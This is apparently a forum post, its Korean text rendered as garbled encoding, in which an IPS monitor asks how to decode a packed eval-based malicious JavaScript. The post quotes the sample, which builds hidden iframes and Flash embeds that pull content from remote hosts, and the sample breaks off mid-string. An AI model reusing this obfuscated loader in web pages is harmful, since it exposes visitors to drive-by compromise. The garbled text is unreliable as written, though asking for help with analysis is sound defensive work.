¾È³çÇϼ¼¿ä. IPS ¸ð´ÏÅ͸µÇÏ°í Àִ»ç¶÷ÀÔ´Ï´Ù. ¾î´À³¯ raw data¸¦ º¸´Ï eval·Î µÈ malicious javascript °ø°ÝÀÌ Áö¼ÓÀûÀ¸·Î µé¾î¿À´õ±º¿ä. Src Ip°¡ Áö¼ÓÀûÀ¸·Î malicious javascript°¡ ÇÏ·ç¿¡ ¸îõ°Ç¾¿ µé¾î¿À°í ÀÖ½À´Ï´Ù. ¹®Á¦´Â ¹ØÀÇ raw data¸¦ µðÄÚµùÇÏ´Â °ÍÀε¥ deanÀÌ ¸¸µç malicious javascript °ø°ÝÀÌ ²Ï ºÐ¼®Çϱ⠾î·Æ´õ±º¿ä. Á˼ÛÇÏÁö¸¸ ¹ØÀÇ raw dataÀÇ µðÄÚµùÇÏ´Â ¹ýÁ» °¡¸£ÃÄ ÁֽʽÿÀ. ¤Ð.¤Ð alert´Â ÀÌ¹Ì ½áº¸¾Ò½À´Ï´Ù. ÇÏÁö¸¸ À߸øµÈ Àü¼ÛÀ̶ó¸é¼ ¿¡·¯¸Þ½ÃÁö Æ˾÷âÀÌ ¶å´Ï´Ù.
=>eval(function(p,a,c,k,e,d)
{
e=function(c)
{
return(c<a?'':e(parseInt(c/a)))+((c=c%a)35? String.fromCharCode(c+29):c.toString(36))
};
if(!''.replace(/^/,String))
{
while(c--)
{
d[e(c)]=k[c]||e(c)
}
k=[function(e){ return d[e]}];e=function(){return'\\w+'};c=1};while(c--)
{
if(k[c])
{
p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])
}
}
return p
}
('3 1w="b://O.p.k/I/";3 1x=[];3 K=1y D();K[0]=D("1u","0","2","",1,1r,0,0,1s,1t,0,"1z","1A","1G",1,0.4,"1H",1);3 1I=D("1E.c","E.c","H");3 B=[];3 z=[];3 A=[];3 F=[];3 y=[];3 G=[];B[0]="b://1B.p.k/1C/1D.1q?t=1p";z[0]="1c.c";A[0]="b://1d.1e.L/1b/?1a";F[0]="E.c";y[0]="H";G[0]="J";B[1]="b://17.18.19.L/1g.1m?1n=1o&1l=1k";z[1]="1i.c";A[1]="#";F[1]="E.c";y[1]="H";G[1]="J";3 24=25;3 2a=j;3 2b,2j;3 2h;P N(){u(!f.S("l")){3 a=f.2g("9");a.5="l";f.2f.2d(a);a.e.d=1;a.e.g=1;a.e.21="1Q"}3 i="ɡ 5=\\"1R\\" >";i+=M(\'b://O.p.k/I/1N.1S\',\'R\',\'R\',\'1Z\',\'\',\'\',\'20\');i+="</9>";3 r=f.S(\'l\');u(r){r.1U=i}}P M(v,w,h,5,q,s,o){u(1M.2e=="2c 29 1j"){3 n="<Q 1T=\'C j\' 2i=\'1W:1V-1X-1Y-1L-1O\' 15=\'12/x-11-10\' g=\'"+w+"\' d=\'"+h+"\' 5=\'"+5+"\' 6=\'"+5+"\' Y=\'Z\'>"+"ɠ 6=\'23\' 7=\'"+v+"\' />"+"ɠ 6=\'14\' 7=\'"+s+"\' />"+"ɠ 6=\'X\' 7=\'"+o+"\' />"+"ɠ 6=\'6\' 7=\'"+5+"\' />"+"ɠ 6=\'W\' 7=\'j\' />"+"ɠ 6=\'V\' 7=\'T\' />"+"ɠ 6=\'27\'7=\'13\' / |
214, 
7/11 
